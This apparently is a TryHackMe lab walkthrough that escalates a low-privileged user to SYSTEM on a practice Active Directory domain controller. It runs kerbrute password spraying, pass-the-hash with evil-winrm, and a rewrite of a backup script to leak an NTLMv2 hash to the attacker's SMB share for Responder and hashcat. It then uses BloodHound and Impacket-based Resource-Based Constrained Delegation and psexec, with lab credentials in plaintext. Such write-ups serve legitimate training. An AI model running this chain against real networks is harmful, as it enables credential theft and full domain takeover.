Overview
TryHackMe K2: Part 3 – Summit is the final room in the K2 Active Directory attack chain where the objective is to escalate privileges from a low-privileged domain user to full Domain Administrator access. This room focuses heavily on Active Directory enumeration, abusing weak permissions, capturing NTLM hashes, BloodHound analysis, and finally exploiting Resource-Based Constrained Delegation (RBCD) for privilege escalation.
This walkthrough covers the complete attack path from initial access to obtaining SYSTEM privileges on the Domain Controller.
Enumeration
The first step was running an Nmap scan against the target.
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
7680/tcp open pando-pub
9389/tcp open adws
49668/tcp open unknown
49676/tcp open unknown
49677/tcp open unknown
49680/tcp open unknown
49684/tcp open unknown
49715/tcp open unknown
49794/tcp open unknown
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-13 17:22:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-04-13T17:23:44+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: K2
| NetBIOS_Domain_Name: K2
| NetBIOS_Computer_Name: K2ROOTDC
| DNS_Domain_Name: k2.thm
| DNS_Computer_Name: K2RootDC.k2.thm
| DNS_Tree_Name: k2.thm
| Product_Version: 10.0.17763
|_ System_Time: 2025-04-13T17:23:05+00:00
| ssl-cert: Subject: commonName=K2RootDC.k2.thm
| Not valid before: 2025-04-12T17:15:47
|_Not valid after: 2025-10-12T17:15:47
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: K2ROOTDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-13T17:23:08
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 196.76 ms 10.14.0.1
2 197.26 ms 10.10.21.9
The scan revealed several Active Directory related services:
- Kerberos (88)
- LDAP (389)
- SMB (445)
- WinRM (5985)
- RDP (3389)
- Global Catalog LDAP (3268)
Important information gathered:
- Hostname:
K2RootDC - Domain:
k2.thm - Operating System: Windows Server 2019
We can see that the computer name is K2RootDC.k2.thm so let’s add that to /etc/hosts file
Users and Passwords from the previous machines
Users
j.bold
r.bud
j.smith
administrator
Passwords
Pwd@9tLNrC3!
RdzQ7MSKt)fNaz3!
vRMkaVgdfxhW!8
#8rockyou
AlenBenedict123
Technique – to make a program run anywhere in the OS
There are two methods to make a program run anywhere, 1st is to export the location where the location is at and the 2nd method is to move the binary to one of the path in PATH variable.
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ echo $PATH
/home/alen/.local/bin:/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/home/alen/.dotnet/tools
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ sudo mv kerbrute /usr/local/bin
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ cd ..
┌──(alen㉿kali)-[~/Downloads]
└─$ kerbrute
Username Enumeration
Using usernames collected from previous K2 rooms:
┌──(alen㉿kali)-[~/Downloads]
└─$ kerbrute userenum --dc k2rootdc.k2.thm -d k2.thm users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ / ___/ __ / ___/ / / / __/ _
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|___/_/ /_.___/_/ __,_/__/___/
Version: v1.0.3 (9dad6e1) - 04/13/25 - Ronnie Flathers @ropnop
2025/04/13 21:44:02 > Using KDC(s):
2025/04/13 21:44:02 > k2rootdc.k2.thm:88
2025/04/13 21:44:02 > [+] VALID USERNAME: j.smith@k2.thm
2025/04/13 21:44:02 > [+] VALID USERNAME: administrator@k2.thm
2025/04/13 21:44:02 > Done! Tested 4 usernames (2 valid) in 0.248 seconds
Bruteforcing the passwords with valid users
┌──(alen㉿kali)-[~/Downloads]
└─$ kerbrute bruteuser --dc k2rootdc.k2.thm -d k2.thm passwords.txt j.smith
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ / ___/ __ / ___/ / / / __/ _
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|___/_/ /_.___/_/ __,_/__/___/
Version: v1.0.3 (9dad6e1) - 04/13/25 - Ronnie Flathers @ropnop
2025/04/13 21:45:41 > Using KDC(s):
2025/04/13 21:45:41 > k2rootdc.k2.thm:88
2025/04/13 21:45:42 > Done! Tested 5 logins (0 successes) in 0.642 seconds
┌──(alen㉿kali)-[~/Downloads]
└─$ kerbrute bruteuser --dc k2rootdc.k2.thm -d k2.thm passwords.txt administrator
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ / ___/ __ / ___/ / / / __/ _
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|___/_/ /_.___/_/ __,_/__/___/
Version: v1.0.3 (9dad6e1) - 04/13/25 - Ronnie Flathers @ropnop
2025/04/13 21:45:50 > Using KDC(s):
2025/04/13 21:45:50 > k2rootdc.k2.thm:88
2025/04/13 21:45:51 > Done! Tested 5 logins (0 successes) in 0.724 seconds
In the previous room they have asked what is Administrator’s NTLM Hash, this might be hint to actually use the hash in this room
┌──(alen㉿kali)-[~/Downloads]
└─$ evil-winrm -u j.smith -H 9545b61858c043477c350ae86c37b32f -i k2rootdc.k2.thm
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:Usersj.smithDocuments>
We see that we have got access to j.smith, now we have to enumerate the system
*Evil-WinRM* PS C:Users> dir
Directory: C:Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/13/2025 5:26 PM Administrator
d----- 5/30/2023 2:29 AM j.smith
d----- 5/30/2023 1:31 AM o.armstrong
d-r--- 12/12/2018 7:45 AM Public
We can see the list of users
*Evil-WinRM* PS C:> dir
Directory: C:
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/14/2018 6:56 AM EFI
d----- 5/13/2020 5:58 PM PerfLogs
d-r--- 11/14/2018 4:10 PM Program Files
d----- 3/11/2021 7:29 AM Program Files (x86)
d----- 5/30/2023 1:32 AM Scripts
d-r--- 5/30/2023 2:29 AM Users
d----- 5/30/2023 1:17 AM Windows
At the root of the filesystem we can see that there is folder called as scripts
*Evil-WinRM* PS C:> cd Scripts
*Evil-WinRM* PS C:Scripts> dir
Directory: C:Scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/30/2023 1:32 AM 92 backup.bat
*Evil-WinRM* PS C:Scripts> type backup.bat
copy C:\Users\o.armstrong\Desktop\notes.txt C:\Users\o.armstrong\Documents\backup_notes.txt
We can see that it is copy program
*Evil-WinRM* PS C:> Get-Acl -Path C:Scripts
Directory: C:
Path Owner Access
---- ----- ------
Scripts BUILTINAdministrators K2j.smith Allow FullControl...
*Evil-WinRM* PS C:> Get-Acl -Path C:Scriptsbackup.bat
Directory: C:Scripts
Path Owner Access
---- ----- ------
backup.bat K2o.armstrong NT AUTHORITYSYSTEM Allow FullControl...
*Evil-WinRM* PS C:>
When we look at the permission for the folder we can see that j.smith has full access on that folder, but doesn’t have full control over the file backup.bat
So we can remove backup.bat and make that we are setting up responder so that we can get a callback and get the hash
In the victim machine
*Evil-WinRM* PS C:> cd Scripts
*Evil-WinRM* PS C:Scripts> rm backup.bat
*Evil-WinRM* PS C:Scripts> Set-Content -Path "C:\Scripts\backup.bat" -Value "copy \\10.14.100.15\pwned.txt C:\Users\o.armstrong\Documents\pwned.txt"
*Evil-WinRM* PS C:Scripts> dir
Directory: C:Scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/14/2025 2:22 PM 72 backup.bat
*Evil-WinRM* PS C:Scripts> type backup.bat
copy \\10.14.100.15\pwned.txt C:\Users\o.armstrong\Documents\pwned.txt
*Evil-WinRM* PS C:Scripts>
In the Attacker Machine
┌──(alen㉿kali)-[~/Downloads]
└─$ sudo responder -I tun0
[sudo] password for alen:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.10.27
[SMB] NTLMv2-SSP Username : K2o.armstrong
[SMB] NTLMv2-SSP Hash : o.armstrong::K2:0f10478086abe3a8:81C7397B390D47385B7D41605AC6AC83:010100000000000080B96D046AADDB017192AD394B58B33D0000000002000800570057004A00540001001E00570049004E002D0059004500340031004C0046003600360044003700490004003400570049004E002D0059004500340031004C004600360036004400370049002E00570057004A0054002E004C004F00430041004C0003001400570057004A0054002E004C004F00430041004C0005001400570057004A0054002E004C004F00430041004C000700080080B96D046AADDB0106000400020000000800300030000000000000000000000000210000158265087D1F75B0A2B7C6876F663854CDD008FA2C75F215B0EE7E7F528B5F280A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310034002E003100300030002E00310035000000000000000000
[*] Skipping previously captured hash for K2o.armstrong
[+] Exiting...
We have got the hash now crack it using Hashcat
┌──(alen㉿kali)-[~/Downloads]
└─$ hashcat armstrong-hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
O.ARMSTRONG::K2:0f10478086abe3a8:81c7397b390d47385b7d41605ac6ac83:010100000000000080b96d046aaddb017192ad394b58b33d0000000002000800570057004a00540001001e00570049004e002d0059004500340031004c0046003600360044003700490004003400570049004e002d0059004500340031004c004600360036004400370049002e00570057004a0054002e004c004f00430041004c0003001400570057004a0054002e004c004f00430041004c0005001400570057004a0054002e004c004f00430041004c000700080080b96d046aaddb0106000400020000000800300030000000000000000000000000210000158265087d1f75b0a2b7c6876f663854cdd008fa2c75f215b0ee7e7f528b5f280a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310034002e003100300030002e00310035000000000000000000:arMStronG08
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: O.ARMSTRONG::K2:0f10478086abe3a8:81c7397b390d47385b...000000
Time.Started.....: Mon Apr 14 18:24:02 2025 (11 secs)
Time.Estimated...: Mon Apr 14 18:24:13 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 935.8 kH/s (0.58ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10020864/14344385 (69.86%)
Rejected.........: 0/10020864 (0.00%)
Restore.Point....: 10019840/14344385 (69.85%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
We can see that we have got the password which is arMStronG08.
We can use these details and use bloodhound
┌──(alen㉿kali)-[~/Downloads/k2thesummit]
└─$ ls
ad-bloodhound.sh
┌──(alen㉿kali)-[~/Downloads/k2thesummit]
└─$ ./ad-bloodhound.sh
Domain:
k2.thm
Username:
o.armstrong
Password:
arMStronG08
IP of Domain:
10.10.10.27
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: k2.thm
INFO: Getting TGT for user
INFO: Connecting to LDAP server: k2rootdc.k2.thm
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: k2rootdc.k2.thm
INFO: Found 6 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: K2RootDC.k2.thm
INFO: Done in 00M 31S
┌──(alen㉿kali)-[~/Downloads/k2thesummit]
└─$ ls
20250414183248_computers.json 20250414183248_domains.json 20250414183248_groups.json 20250414183248_users.json
20250414183248_containers.json 20250414183248_gpos.json 20250414183248_ous.json ad-bloodhound.sh
Now upload these files to bloodhound, first initiate neo4j console then initiate bloodhound
We can use evil-winrm to get inside the o.armstrong user
┌──(alen㉿kali)-[~/Downloads]
└─$ evil-winrm -u o.armstrong -p arMStronG08 -i k2rootdc.k2.thm
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:Userso.armstrongDocuments> dir
Directory: C:Userso.armstrongDocuments
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/30/2023 1:35 AM 136 backup_notes.txt
*Evil-WinRM* PS C:Userso.armstrongDocuments> type backup_notes.txt
Things to check:
1. Check on the IT Website hosted on the Linux Server. Is it vulnerable?
2. Enforce the password policy on everyone!
*Evil-WinRM* PS C:Userso.armstrongDocuments> cd ..
*Evil-WinRM* PS C:Userso.armstrong> cd Desktop
*Evil-WinRM* PS C:Userso.armstrongDesktop> dir
Directory: C:Userso.armstrongDesktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/21/2016 3:36 PM 527 EC2 Feedback.website
-a---- 6/21/2016 3:36 PM 554 EC2 Microsoft Windows Guide.website
-a---- 5/30/2023 1:35 AM 136 notes.txt
-a---- 5/30/2023 2:28 AM 38 user.txt
*Evil-WinRM* PS C:Userso.armstrongDesktop>
Checking Privileges Escalation Vectors in Windows
*Evil-WinRM* PS C:\Users\o.armstrong\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:Userso.armstrongDesktop> net user o.armstrong /domain
User name o.armstrong
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/30/2023 1:23:21 AM
Password expires Never
Password changeable 5/31/2023 1:23:21 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/14/2025 4:29:00 PM
Logon hours allowed All
Local Group Memberships *IT Director *Performance Log Users
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:Users\o.armstrong\Desktop>
We can see that o.armstrong is a member of IT Director Group, we can see that using bloodhound as well
When you search for o.armstrong and click on direct members we can see that it is a member of it director
When we search for IT Director and click on first degree control we can see that we have generic write on the DC
When you click on the ? icon we can see the linux abuse section
We are going to be performing Resource-Based Constrained Delegation
RBCD First Step – Add Computer
┌──(alen㉿kali)-[~/Downloads]
└─$ locate addcomputer
/usr/bin/impacket-addcomputer
/usr/share/doc/python3-impacket/examples/addcomputer.py
┌──(alen㉿kali)-[~/Downloads]
└─$ python3 /usr/share/doc/python3-impacket/examples/addcomputer.py -method LDAPS -computer-name 'ALENBENEDICT$' -computer-pass 'AlenBenedict123' -dc-host k2rootdc.k2.thm -domain-netbios k2.thm 'k2.thm/o.armstrong:arMStronG08'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] socket ssl wrapping error: [Errno 104] Connection reset by peer
┌──(alen㉿kali)-[~/Downloads]
└─$ python3 /usr/share/doc/python3-impacket/examples/addcomputer.py -method ghcghc -computer-name 'ALENBENEDICT$' -computer-pass 'AlenBenedict123' -dc-host k2rootdc.k2.thm -domain-netbios k2.thm 'k2.thm/o.armstrong:arMStronG08'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
usage: addcomputer.py [-h] [-domain-netbios NETBIOSNAME] [-computer-name COMPUTER-NAME$] [-computer-pass password] [-no-add] [-delete] [-debug]
[-method {SAMR,LDAPS}] [-port {139,445,636}] [-baseDN DC=test,DC=local] [-computer-group CN=Computers,DC=test,DC=local] [-hashes LMHASH:NTHASH]
[-no-pass] [-k] [-aesKey hex key] [-dc-host hostname] [-dc-ip ip]
[domain/]username[:password]
addcomputer.py: error: argument -method: invalid choice: 'ghcghc' (choose from SAMR, LDAPS)
┌──(alen㉿kali)-[~/Downloads]
└─$ python3 /usr/share/doc/python3-impacket/examples/addcomputer.py -method SAMR -computer-name 'ALENBENEDICT$' -computer-pass 'AlenBenedict123' -dc-host k2rootdc.k2.thm -domain-netbios k2.thm 'k2.thm/o.armstrong:arMStronG08'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account ALENBENEDICT$ with password AlenBenedict123.
2nd Step using rbcd.py
┌──(alen㉿kali)-[~/Downloads]
└─$ locate rbcd
/usr/bin/impacket-rbcd
/usr/share/doc/metasploit-framework/modules/auxiliary/admin/ldap/rbcd.md
/usr/share/doc/python3-impacket/examples/rbcd.py
/usr/share/metasploit-framework/modules/auxiliary/admin/ldap/rbcd.rb
┌──(alen㉿kali)-[~/Downloads]
└─$ python3 /usr/share/doc/python3-impacket/examples/rbcd.py -delegate-from 'ALENBENEDICT$' -delegate-to 'K2ROOTDC$' -action 'write' 'k2.thm/o.armstrong:arMStronG08'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ALENBENEDICT$ can now impersonate users on K2ROOTDC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ALENBENEDICT$ (S-1-5-21-1966530601-3185510712-10604624-1116)
3rd Step using getST.py
┌──(alen㉿kali)-[~/Downloads]
└─$ python3 /usr/share/doc/python3-impacket/examples/getST.py -spn 'cifs/k2rootdc.k2.thm' -impersonate 'administrator' 'k2.thm/ALENBENEDICT:AlenBenedict123'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_k2rootdc.k2.thm@K2.THM.ccache
4th Step – Pass the Ticket
┌──(alen㉿kali)-[~/Downloads]
└─$ mv administrator@cifs_k2rootdc.k2.thm@K2.THM.ccache k2thesummit
┌──(alen㉿kali)-[~/Downloads/k2thesummit]
└─$ export KRB5CCNAME=administrator@cifs_k2rootdc.k2.thm@K2.THM.ccache
┌──(alen㉿kali)-[~/Downloads/k2thesummit]
└─$ python3 /usr/share/doc/python3-impacket/examples/psexec.py -k 'k2.thm/administrator@k2rootdc.k2.thm'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Requesting shares on k2rootdc.k2.thm.....
[*] Found writable share ADMIN$
[*] Uploading file uRHirXJS.exe
[*] Opening SVCManager on k2rootdc.k2.thm.....
[*] Creating service Kwpb on k2rootdc.k2.thm.....
[*] Starting service Kwpb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4377]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authoritysystem
C:\Windows\system32> cd ../..
C:\> cd Users
C:Users> dir
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:Users
05/30/2023 02:29 AM <DIR> .
05/30/2023 02:29 AM <DIR> ..
04/14/2025 02:04 PM <DIR> Administrator
05/30/2023 02:29 AM <DIR> j.smith
05/30/2023 01:31 AM <DIR> o.armstrong
12/12/2018 07:45 AM <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 13,151,580,160 bytes free
C:\Users> cd Administrator
C:\Users\Administrator> cd Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:UsersAdministratorDesktop
05/30/2023 02:28 AM <DIR> .
05/30/2023 02:28 AM <DIR> ..
06/21/2016 03:36 PM 527 EC2 Feedback.website
06/21/2016 03:36 PM 554 EC2 Microsoft Windows Guide.website
05/30/2023 02:28 AM 37 root.txt
3 File(s) 1,118 bytes
2 Dir(s) 13,151,449,088 bytes free
C:\Users\Administrator\Desktop>